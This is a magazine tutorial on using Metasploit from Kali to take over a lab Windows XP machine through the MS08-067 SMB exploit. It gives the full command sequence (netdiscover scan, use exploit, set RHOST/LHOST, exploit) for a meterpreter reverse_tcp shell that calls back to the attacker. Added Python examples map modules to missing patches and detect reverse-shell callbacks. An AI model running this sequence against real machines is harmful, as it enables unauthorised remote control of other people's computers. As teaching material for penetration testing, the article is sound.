Linux Format

Metasploitation

No computer program is perfect and it’s not possible to predict every output for every input as neither humans nor computers are omniscient.


It’s a rare piece of code that never requires patching to fix some flaw or other that allows users to do what they were never meant to do. Exploits can be as simple as checking out plain text password files in an unprotected directory, or inputting something akin to the Konami code. It can be spamming a password field until it breaks, or writing more data to a memory buffer than it can hold.

Hackers have been hacking since before the first computers were networked together with bits of string and sticky tape. Generally, this involves poking things until they break, and then poking them again. Occasionally, it involves the careful inspection of code to see whether there are any obvious flaws that developers have missed. This is one of the great arguments both for and against open source software. Yes, evil hackers can inspect your code for vulnerabilities, but so can everyone else, and the sooner it’s seen, the sooner it can be fixed.

Over the years, hackers have uncovered tens of thousands of individual vulnerabilities in software, and developed exploits that you can use to take advantage of them, giving you privilege escalation and perhaps even complete control over an entire machine.

Keeping track of these individual hacks, cracks and exploits is difficult, and the last thing you want when sneaking around a megacorp is to have to go and consult the exploit index cards you keep in a locked filing cabinet in your secret lair.

The Metasploit framework is maintained by security company Rapid7 in order to help catalogue, develop and rapidly execute code against a target you’ve previously identified.

Like all such security tools, the Metasploit framework should only be used for penetration testing and ensuring that any holes it uncovers are plugged – however, it’s not altogether outside the bounds of possibility that bad actors use it in the wild to get up to no good.

The WordPress install we set up on the previous pages is fresh, up to date and, so far as anyone can tell, contains no vulnerabilities. It isn’t invulnerable, of course, but those vulnerabilities have yet to be discovered. After WordPress patches them, exploits to take advantage of the flaws will eventually end up as part of the Metasploit framework. Site owners who haven’t kept up to date with patches will fall victim to attacks, and soon find their precious pages distributing malware to visitors.

We’re unsure of Future’s policies on publishing tutorials on how to actively attack the world’s most popular content management system, but we’re pretty sure it doesn’t look too kindly on it.

Instead, we’ve spun up a copy of Windows XP Professional SP3 – released in 2009, and with security patches and updates running to 2015. Surprisingly, Windows XP is still in use, and as of October 2022, 1.27% of all PCs were running the 22-year-old OS, giving it a larger market share than Windows 11.

Our target machine is running utilities typical of the time, including Firefox v40.03, FlashPlayer v18.0.0.232 and Microsoft’s .NET framework v2015.9.10. It is, in short, a target-rich environment, and one which, while not especially common in 2023, is certainly still around.

After attaching to the same local network as our Windows XP machine, we donned our black hoodies, and got to work.

To find the IP address of the target machine, run:

$ sudo netdiscover -r 192.168.0.0/24

Take a note of the machine’s IP address, because you’ll need it in a minute.

Start the Metasploit console by either selecting it from your system menu or entering msfconsole and wait while it sets up the database and displays an entertaining CowSay.

If this is your first time running Metasploit, it’s worthwhile entering help to see what’s available to you and view some example commands. To use a Metasploit exploit, enter use followed by the path to the exploit you want.

Before you can do this, decide which aspect of Windows you want to attack. To find a suitable attack surface, you can use the search function to see what’s available. For instance:

$ search exploit/windows

Alternatively, you can browse through https://github.com/rapid7/metasploit-framework/tree/master/documentation/modules/exploit/windows.

Take your time and read the documentation. We decided on the ms08_067_netapi, as it has a reputation for reliability, and will allow us to gain access as SYSTEM – the highest Windows privilege level. When you’re ready, enter:

$ use exploit/windows/smb/ms08_067_netapi
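Module paths follow a fixed layout (type/platform/service/name), and Windows module names that start with an MS bulletin id tell you which patch closes the hole. As an added example, not code from the article or from the Metasploit project, the Python below parses a module path into those parts and checks a host inventory for machines that lack the bulletin the module depends on. The inventory, the hostnames and the idea of recording applied bulletins per host are constructed for this example; only the module path exploit/windows/smb/ms08_067_netapi comes from the article, and the inventory includes a Linux host to show the same check is platform-aware.

```python
"""Triage Metasploit module paths against a patch inventory.

Added example, not code from the Linux Format article or from the
Metasploit project. The host inventory below is constructed; only the
module path exploit/windows/smb/ms08_067_netapi comes from the article.
"""
import re
from typing import NamedTuple, Optional


class ModulePath(NamedTuple):
    kind: str                # exploit, auxiliary, post, ...
    platform: str            # windows, linux, multi, ...
    service: str             # smb, http, ... (may span several segments)
    name: str                # ms08_067_netapi
    bulletin: Optional[str]  # "MS08-067" when the name starts with an MS bulletin id


# Windows module names that begin with a bulletin id look like ms08_067_...
_BULLETIN = re.compile(r"^ms(\d{2})_(\d{3})(?:_|$)")


def parse_module_path(path: str) -> ModulePath:
    """Split 'exploit/windows/smb/ms08_067_netapi' into its components."""
    parts = path.strip("/").split("/")
    if len(parts) < 4:
        raise ValueError(f"unexpected module path: {path!r}")
    kind, platform, name = parts[0], parts[1], parts[-1]
    service = "/".join(parts[2:-1])
    m = _BULLETIN.match(name)
    bulletin = f"MS{m.group(1)}-{m.group(2)}" if m else None
    return ModulePath(kind, platform, service, name, bulletin)


# Constructed inventory: hostname -> (platform, bulletin ids confirmed applied).
# An empty set models a freshly installed, never-patched box.
INVENTORY = {
    "xp-lab-01": ("windows", set()),
    "xp-lab-02": ("windows", {"MS08-067"}),
    "web-01": ("linux", set()),
}


def hosts_missing_patch(module_path: str, inventory=INVENTORY) -> Optional[list]:
    """Return hosts on the module's platform that lack the patch it targets.

    Returns None (not an empty list) when the module name carries no bulletin
    id, so "could not map this module" is never mistaken for "everything is
    patched"; such modules need a manual mapping to the vendor advisory.
    """
    mod = parse_module_path(module_path)
    if mod.bulletin is None:
        return None
    return sorted(
        host
        for host, (platform, applied) in inventory.items()
        if platform == mod.platform and mod.bulletin not in applied
    )


if __name__ == "__main__":
    print(parse_module_path("exploit/windows/smb/ms08_067_netapi"))
    print(hosts_missing_patch("exploit/windows/smb/ms08_067_netapi"))
```

The same type/platform/service/name split is what the documentation tree linked above is organised by, so a parsed path also tells you where to look for the module's write-up before deciding whether a host is exposed.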

As you haven’t configured a payload, Metasploit selects the default for you: windows/meterpreter/reverse_tcp. The prompt turns red. Type show options.

You’ll need to set the target machine’s IP address, so now enter:

$ set RHOST target.ip.address

The Exploit Target should already be set to 0 for automatic targeting. If it isn’t, enter:

$ set TARGET 0

If you decide not to go with the default payload, you can choose a different one with:

$ set PAYLOAD path/to/payload

However, we’re happy with the default choice. LHOST is your IP address and will be embedded within the payload to ensure that your malware can phone home. Find your IP address with ifconfig.

Now set the LHOST with:

$ set LHOST your.ip.address

You’re now ready to start your attack. Draw the curtains, don your dark glasses, and enter exploit .

You’ll see a message that a session has been opened, and the prompt will change yet again, showing that you’re in a Meterpreter session. You’re actually inside someone else’s Windows PC. Type ? to access the help menu to see what you can get up to while you’re there.
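The reverse_tcp payload used here makes the target open a connection back to LHOST, so on the wire the session looks like an inbound connection to the SMB port followed almost immediately by an outbound connection from the target to the very same peer. As an added example, not code from the article or from Metasploit, the Python below applies that correlation to constructed firewall log lines to flag the callback; the log format, the addresses, the monitored host and the 120-second window are all assumptions for this example.

```python
"""Spot reverse-shell callbacks in connection logs.

Added example, not code from the Linux Format article or from Metasploit.
The log lines, addresses and line format below are constructed for the
example; a real firewall or NetFlow export will need its own parser.
"""
from datetime import datetime, timedelta
from typing import List, NamedTuple, Set


class Conn(NamedTuple):
    ts: datetime
    src: str
    sport: int
    dst: str
    dport: int


# Constructed log format: "<ISO timestamp> <src>:<port> -> <dst>:<port> <proto>"
SAMPLE_LOG = """\
2023-03-01T10:00:01 192.168.0.20:51000 -> 192.168.0.42:445 TCP
2023-03-01T10:00:02 192.168.0.42:1045 -> 192.168.0.20:4444 TCP
2023-03-01T10:05:00 192.168.0.31:49152 -> 192.168.0.42:445 TCP
2023-03-01T10:09:30 192.168.0.42:1046 -> 10.0.0.5:443 TCP
2023-03-01T11:00:00 192.168.0.42:1047 -> 192.168.0.31:80 TCP
"""

# Constructed: the legacy hosts we care about (the XP box in a lab like the article's).
MONITORED: Set[str] = {"192.168.0.42"}


def parse_line(line: str) -> Conn:
    """Parse one constructed log line into a Conn record."""
    ts, src, _arrow, dst, _proto = line.split()
    src_ip, src_port = src.rsplit(":", 1)
    dst_ip, dst_port = dst.rsplit(":", 1)
    return Conn(datetime.fromisoformat(ts), src_ip, int(src_port), dst_ip, int(dst_port))


def parse_log(text: str) -> List[Conn]:
    return [parse_line(line) for line in text.splitlines() if line.strip()]


def find_callbacks(conns, monitored=MONITORED, window=timedelta(seconds=120), smb_port=445):
    """Return (victim, peer, inbound_ts, callback_ts, callback_port) tuples.

    An alert fires when a monitored host receives a connection on the SMB
    port from some peer and then, within `window`, opens a new connection
    back to that same peer. The callback port is reported but not used for
    matching, so changing the listener port does not evade the rule.
    """
    ordered = sorted(conns, key=lambda c: c.ts)
    alerts = []
    for i, inbound in enumerate(ordered):
        if inbound.dst not in monitored or inbound.dport != smb_port:
            continue
        for later in ordered[i + 1:]:
            if later.ts - inbound.ts > window:
                break  # log is time-ordered, nothing later can match
            if later.src == inbound.dst and later.dst == inbound.src:
                alerts.append((inbound.dst, inbound.src, inbound.ts, later.ts, later.dport))
    return alerts


if __name__ == "__main__":
    for victim, peer, t_in, t_back, port in find_callbacks(parse_log(SAMPLE_LOG)):
        print(f"{victim}: SMB from {peer} at {t_in:%H:%M:%S}, "
              f"callback to {peer}:{port} at {t_back:%H:%M:%S}")
```

Metasploit's reverse_tcp handler listens on port 4444 unless LPORT is changed, which is why the sample callback uses it, but the rule deliberately keys on the peer rather than the port. The second SMB connection in the sample (from 192.168.0.31) never produces an alert because the later connection back to that host is an hour away, well outside the window; on a real network, callbacks to a peer's ordinary service ports from hosts that legitimately act as both SMB server and client would need excluding to keep the false-positive rate down.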

If you’re showing off to a friend, to demonstrate just how insecure Windows XP really is in 2023, editing the contents of files and then turning the machine off should provide ample evidence that no, you’re not paranoid, and it really is dangerous out there.

But we deliberately chose an obsolete OS on which to perform our penetration tests, and it’s unlikely that you or anyone you know is still using Windows XP. Browse through the available exploits and you’ll see that it’s not just antique Microsoft products at risk. The most recent exploits you can deploy against Windows were added under a week ago. If you think you’re safe with a slightly out-of-date Linux system, think again. There’s a ton of exploits that can be used for privilege escalation with the express purpose of giving you a headache and eventually stealing your cash.

If you fancy your hand at more esoteric hacking, you’ll also be able to run attacks against such diverse operating systems as BSD, Solaris, Android, iOS and even mainframes. Congratulations – you are now a script kiddie.

Caption: If your desktop looks like this, you’re probably going to have a bad time – unless it’s because you’re running Kali undercover and trying to look cool like it’s 2002.

Caption: The array of tools available to you is truly staggering. If a vulnerability exists, Kali probably has an exploit that can abuse it. The wallpaper selection is good, too.

Caption: With Metasploit on Kali Linux, you can take complete control of an old Windows box in a matter of minutes. Why you’d want to is beyond us.
